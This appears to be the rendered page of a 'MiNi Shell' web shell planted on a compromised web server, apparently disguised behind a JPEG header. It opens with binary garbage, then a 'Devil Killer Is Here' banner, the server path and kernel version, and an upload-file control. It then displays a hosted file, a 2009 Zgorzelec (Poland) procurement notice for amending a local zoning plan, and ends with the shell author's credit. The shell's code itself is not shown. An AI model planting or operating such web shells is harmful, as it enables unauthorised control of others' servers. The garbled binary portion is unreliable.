JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/7562-N-2009.html

<p class="kh_header"><b>Zgorzelec: Opracowanie zmiany miejscowego planu zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy Orzeszkowej</b><br>
<b>Numer ogłoszenia: 7562 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie zmiany miejscowego planu zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy Orzeszkowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia jest opracowanie zmiany miejscowego planu 
   zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie 
   ulicy Orzeszkowej.  
2.Przedmiot zamówienia obejmuje:
   Sporządzenie projektu zmiany miejscowego planu zagospodarowania przestrzennego 
   dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy Orzeszkowej, przyjętego 
   Uchwałą  Nr 202/08  Rady Miasta Zgorzelec z dnia 05.09.2008r. w sprawie 
   przystąpienia do  sporządzenia zmiany miejscowego planu zagospodarowania 
   przestrzennego dzielnicy Ujazd Południe w  Zgorzelcu w rejonie ulicy Orzeszkowej 
   oraz Uchwałą Nr 213/08 Rady  Miasta Zgorzelec z dnia 03.10.2008r. w sprawie 
   zmiany załącznika graficznego nr 1 do Uchwały nr 202/08 Rady Miasta Zgorzelec z 
   dnia 05.09.2008r. w sprawie przystąpienia do sporządzenia zmiany miejscowego 
   planu zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w 
   rejonie ul. Orzeszkowej. 
3.Przedmiot zamówienia dot.  projektu zmiany miejscowego planu zagospodarowania 
   przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie ul. Orzeszkowej, 
   należy wykonać  zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i 
   zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z póź.zm.), oraz       
   rozporządzeniem   Ministra Infrastruktury z dnia 26.08.2003r. w sprawie 
   wymaganego zakresu projektu miejscowego planu zagospodarowania 
   przestrzennego (Dz. U. Nr 164, poz. 1587). 
4.Wymagana skala projektu zmiany miejscowego planu zagospodarowania 
   przestrzennego 1: 2000.
5.Zakres prac obejmuje: 
   1/ analizę  wniosków do zmiany planu i opracowanie propozycji ich rozpatrzenia,  z 
       uwzględnieniem obowiązującego planu, 
   2/ przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia zmiany 
       planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
   3/ sporządzenie projektu zmiany MPZP wraz z prognozą oddziaływania na 
       środowisko uwzględniając ustalenia obowiązującego studium, 
   4/ uzyskanie od Miejskiej Komisji Urbanistyczno-Architektonicznej opinii o projekcie 
       zmiany MPZP, 
   5/ prezentacja koncepcji zmiany MPZP władzom Gminy, 
   6/ sporządzenie prognoz skutków finansowych uchwalenia zmiany MPZP, 
   7/ uzyskanie niezbędnych opinii i uzgodnień do projektu zmiany MPZP, 
   8/ sporządzenie wniosków i uzyskanie zgody na zmianę przeznaczenia gruntów 
       rolnych i leśnych na cele nierolnicze i nieleśne, 
   9/ wprowadzenie zmian do projektu zmiany MPZP, wynikających z uzyskanych opinii
       i dokonanych uzgodnień, 
  10/ przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu zmiany MPZP wraz z 
       prognozą oddziaływania na środowisko, do publicznego wglądu, 
  11/ udział w dyskusjach publicznych nad przyjętymi rozwiązaniami w projekcie 
       zmiany MPZP i w prognozie oddziaływania na środowisko, 
  12/ analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z 
       wyłożeniem do publicznego wglądu projektu zmiany MPZP i prognozy 
       oddziaływania na środowisko, 
  13/ wprowadzenie zmian w projekcie zmiany MPZP, wynikających z rozpatrzenia 
        ewentualnych uwag, 
  14/ ewentualne ponowne uzgodnienie projektu zmiany MPZP w niezbędnych 
       zakresach, 
  15/ przygotowanie projektu uchwały w sprawie przyjęcia zmiany MPZP wraz z listą 
       nieuwzględnionych uwag oraz przedstawienie Radzie Miasta, 
  16/ przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych 
       dotyczących zmiany planu wraz z załącznikami, w celu oceny ich zgodności z 
       przepisami prawnymi przez Wojewodę. 
 6.Do czasu stwierdzenia przez Wojewodę zgodności zmiany planu z przepisami 
    prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia zmiany planu 
    należą do Wykonawcy. 
 7.Obszar objęty zmianą planu obejmuje  powierzchnię ok. 18 ha. 
 8.Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem 
    rzeczowo-finansowym dot. opracowania projektu zmiany miejscowego planu 
    zagospodarowania  przestrzennego dzielnicy Ujazd Południe  w Zgorzelcu w rejonie 
    ul. Orzeszkowej -  załącznik Nr 6 do SIWZ.
9.Wykonawcę  zobowiązuje się do przygotowania kompletu dokumentów, wykazów, 
   pism i  zawiadomień wynikających z trybu opracowania  zmiany planu, udziału w 
   dyskusjach  publicznych poświęconych  zmianie planu, uczestniczenia w 
   posiedzeniach Komisji  Rady Miasta  oraz w sesjach Rady Miasta  poświęconych 
   pracom nad zmianą  planu, przygotowaniem projektów pism, zawiadomień i uchwał 
   wraz z uzasadnieniem w przypadku uwag do zmiany  planu. 
10.Opracowania muszą zawierać część tekstową i graficzną, uwzględniającą 
    określenia wyszczególnione odpowiednio w art. 10 i art. 15 ust. 2 i 3, z 
    uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym.
11.Przedmiot zamówienia należy wykonać techniką tradycyjną wraz z elektronicznym
     zapisem na płycie  CD tekstu (standard  plików .doc) i rysunków planów w plikach
     cyfrowych (standard plików .jpg).
12. Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: 
12.1Dokumenty dot. zmiany miejscowego planu zagospodarowania  przestrzennego 
      należy wykonać w następujących ilościach: 
      1/ tekst zmiany planu - 4 egz. oprawione + płyta CD, 
      2/ rysunek zmiany planu w skali 1:2000 - 4 egz. (w tym min. 2 egz. w kolorze) + 
          płyta CD, 
      3/ rysunek zmiany planu czarno-biały, pomniejszony do publikacji - 4 egz., 
      4/ rysunek zmiany planu w wersji umożliwiającej jego zamieszczenie na stronie 
          internetowej Zamawiającego na nośniku CD 0- 1 egz., 
      5/ prognoza oddziaływania na środowisko - 4 egz. oprawione + płyta CD, 
      6/ prognoza skutków finansowych uchwalenia planu - 4 egz. oprawione + płyta 
          CD. 
13.Wykaz dokumentów, które Zamawiający dostarczy Wykonawcy do opracowania 
     zmiany  miejscowego planu zagospodarowania przestrzennego dzielnicy Ujazd 
     Południe w Zgorzelcu w rejonie ulicy Orzeszkowej: 
     - dane z ewidencji gruntów, 
     - ekofizografię ogólną miasta - do zwrotu, 
     - wytyczne konserwatorskie dla miasta Zgorzelec - do zwrotu, 
     - kopię obowiązującego studium uwarunkowań i kierunków zagospodarowania 
        przestrzennego miasta Zgorzelec - do zwrotu, 
     - Uchwałę Nr 202/08 Rady Miasta Zgorzelec z dnia 05.09.2008r. w sprawie 
        przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania 
        przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy 
        Orzeszkowej, 
     - Uchwałę Nr 213/08 Rady Miasta Zgorzelec z dnia 03 października 2008r. w 
        sprawie zmiany załącznika graficznego nr 1 do uchwały nr 202/08 Rady Miasta 
        Zgorzelec z dnia 05.09.2008r. w sprawie przystąpienia do sporządzenia zmiany 
        miejscowego  planu zagospodarowania przestrzennego dzielnicy Ujazd Południe 
        w Zgorzelcu w rejonie  ulicy Orzeszkowej, 
      - kopię mapy zasadniczej w skali 1:2000 będące w państwowym zasobie 
        geodezyjnym, 
      - kopię obowiązującego miejscowego planu zagospodarowania przestrzennego 
        dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy Orzeszkowej.                             

Zamówienie powyżej 14.000 euro a poniżej kwot określonych w art. 11 ust.8 Pzp.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Warunki udziału w postępowaniu
1.1 O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki 
udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp,  i nie podlegają   
wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające 
spełnienie  tych warunków.    
W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:
1/  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień,
2/  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego  i osób   zdolnych do wykonania zamówienia
3/  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia,  
4/  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
1.2 Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:    
     Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie 
     załączonych do oferty dokumentów, o których mowa w pkt. 2  metodą 
     spełnia / nie  spełnia.
     Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane
     przez zamawiającego jako niespełnienie warunku, co będzie skutkować           
     wykluczeniem  wykonawcy z postępowania, z zastrzeżeniem art.  26 ust. 3 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2.Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy 
    w celu potwierdzenia spełnienia warunków udziału w postępowaniu, 
     zgodnie z  art. 25.ust. 2 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień 
     publicznych i zgodnie z uregulowaniami  rozporządzenia  Prezesa Rady 
     Ministrów z dnia 19 maja 2006 r.  w sprawie rodzajów dokumentów, jakich może 
     żądać  zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być 
     składane (Dz. U. Nr 87, poz. 605), z uwzględnieniem  zmian wprowadzonych 
     rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008r. 
     zmieniające rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać 
     zamawiający  od wykonawcy, oraz form, w jakich te dokumenty mogą być 
     składane (Dz.U.Nr  188,  poz. 1155) 
2.1W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1 
     podpunkt 1, Zamawiający żąda załączenia : 
     1/aktualnego  odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
        do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego 
        nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o 
        dopuszczenie  do udziału w   postępowaniu o udzielenie zamówienia albo 
        składania ofert (§ 1 ust.1,  pkt 2  rozporządzenia Prezesa Rady Ministrów z dnia 
        24 maja 2006r.  Dz.U. Nr 87,  poz. 605) .
        Za aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej uznaje się zarówno dokument 
        wystawiony odpowiednio nie wcześniej  niż sześć m-cy przed upływem terminu 
        składania ofert, jak również dokument, wystawiony  w okresie wcześniejszym, 
        jeżeli istnienie określonych w  nim okoliczności potwierdzone   zostanie przez 
        właściwy organ w wymaganym terminie i  opatrzone urzędową adnotacją  
        potwierdzającą  jego aktualność.   
Uwaga! W przypadku składania oferty przez Wykonawców występujących 
           wspólnie,    w/w  dokument składa każdy z przedsiębiorców  tworzących
           konsorcjum.
 2/ zaświadczenia z Krajowego Rejestru Karnego
     a/  w zakresie określonym w art. 24 ust. 1 pkt  4-8   ustawy Pzp, wystawione nie 
          wcześniej  niż  6 miesięcy przed  terminem składania  ofert, 
     b/ zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
         ust.1 pkt 9  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed 
         terminem składania ofert (§ 1  ust 1. pkt 4 i 5 rozporządzenia Prezesa Rady 
         Ministrów z dnia 24 maja 2006 r. Dz.U. Nr  87,  poz.   605) 
Uwaga! W przypadku składania oferty przez Wykonawców występujących wspólnie, 
           w/w  dokument składa każdy z przedsiębiorców  tworzących konsorcjum.

Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1  
podpunkty   1 i 2b składa dokument lub dokumenty wystawione w kraju, w którym ma  
siedzibę  lub  miejsce  zamieszkania, potwierdzające  odpowiednio:
-  dla pkt. 2.1 podpunkt 1 że  nie otwarto jego likwidacji ani nie ogłoszono upadłości - 
    wystawione nie wcześniej   niż  6 miesięcy przed upływem terminu składania ofert, 
- dla pkt. 2.1 podpunkt 2b, że nie orzeczono wobec niego zakazu ubiegania się o 
   zamówienie, wystawione nie  wcześniej niż 6  miesięcy przed upływem terminu 
   składania ofert. 	
W zakresie dokumentu określonego w pkt. 2.1 podpunkt 2a Wykonawca składa   
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
Wykonawca   ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6   
miesięcy  przed upływem terminu składania ofert.
2.2 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 2,  Zamawiający żąda:
1/wykazu  dwóch  wykonanych, a w przypadku świadczeń okresowych lub 
   ciągłych również wykonywanych usług  w okresie ostatnich trzech lat przed dniem 
   wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
   działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i 
   wartością usług  stanowiącym przedmiot zamówienia wraz z podaniem  daty  i 
   miejsca  wykonania  oraz   załączeniem  dokumentów   potwierdzających,  że usługi 
   te zostały  wykonane    należycie   -  wg załącznika  nr 4   do SIWZ
   Zamawiający wymaga, aby  wykaz zawierał:
   -  dwa uchwalone i obowiązujące miejscowe plany  zagospodarowania 
      przestrzennego lub ich zmiany o  powierzchni  minimum 15 ha każdy, o łącznej 
      wartości min. 50 000,00zł., sporządzone według  procedur i problematyki 
      określonej w  ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu 
      przestrzennym (Dz.U.Nr 80,  poz.717 z póź.zm./, 
2/ - dołączenia wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu 
      zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
      doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także 
      zakresu  wykonywanych przez nich  czynności.  
      Zamawiający wymaga, aby minimum 1 osoba, która będzie wykonywać 
      zamówienie posiadała  uprawnienia zgodne z art. 5 ust.3  ustawy z dnia  
      15.12.2000r. o samorządach zawodowych architektów, inżynierów budownictwa 
      oraz urbanistów (Dz.U. z 2001r. Nr 5 poz.42 z póź.zm.) wraz z aktualnym wpisem 
      na listę członków właściwej izby urbanistów - załącznik nr 5 do SIWZ.
Uwaga! W przypadku składania oferty przez Wykonawców występujących 
         wspólnie, w/w  warunek, musi spełnić co najmniej jeden z          
         przedsiębiorców. 
3/ dołączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób 
    zdolnych  do wykonania  zamówienia, jeżeli w wykazie  o którym mowa w pkt. 11.2 
    podpunkt 2 Wykonawca wskazał osoby, którymi będzie dysponował. 
2.3 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
     podpunkt 3, Zamawiający żąda: 
     1/polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
        wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
        prowadzonej działalności.  
Uwaga! Uwaga! W przypadku składania oferty przez Wykonawców występujących 
        wspólnie, w/w  warunek, musi spełnić co najmniej jeden z przedsiębiorców 
2.4 W celu potwierdzenia, warunków udziału w postępowaniu określonych  w pkt. 1.1
       Zamawiający żąda:
       1/ oświadczenia Wykonawcy, o spełnieniu warunków udziału w postępowaniu 
           zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 
           ustawy Pzp. złożone na formularzu stanowiącym załącznik nr 3  do SIWZ . 
           Wykonawcy,  którzy wspólnie ubiegają się o udzielenie zamówienia wypełniają 
           załącznik nr 3A.
3. Wymagania dotyczące oferty
    Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem 
    odrzucenia oferty zgodnie z art. 89 ust.1 pkt. 2, z zastrzeżeniem art. 87 ust.2 pkt.
    3 ustawy Pzp.  
3.1 wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru) 
3.2 informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum)
3.3 oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ      
3.4 wypełniony i podpisany Harmonogram rzeczowo-finansowy prac planistycznych 
     związanych z opracowaniem  projektu zmiany miejscowego planu 
     zagospodarowania przestrzennego dzielnicy Ujazd Południe  w rejonie ulicy 
     Orzeszkowej w Zgorzelcu - załącznik nr 6 do SIWZ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec
ul. Domańskiego 6 pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2009 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com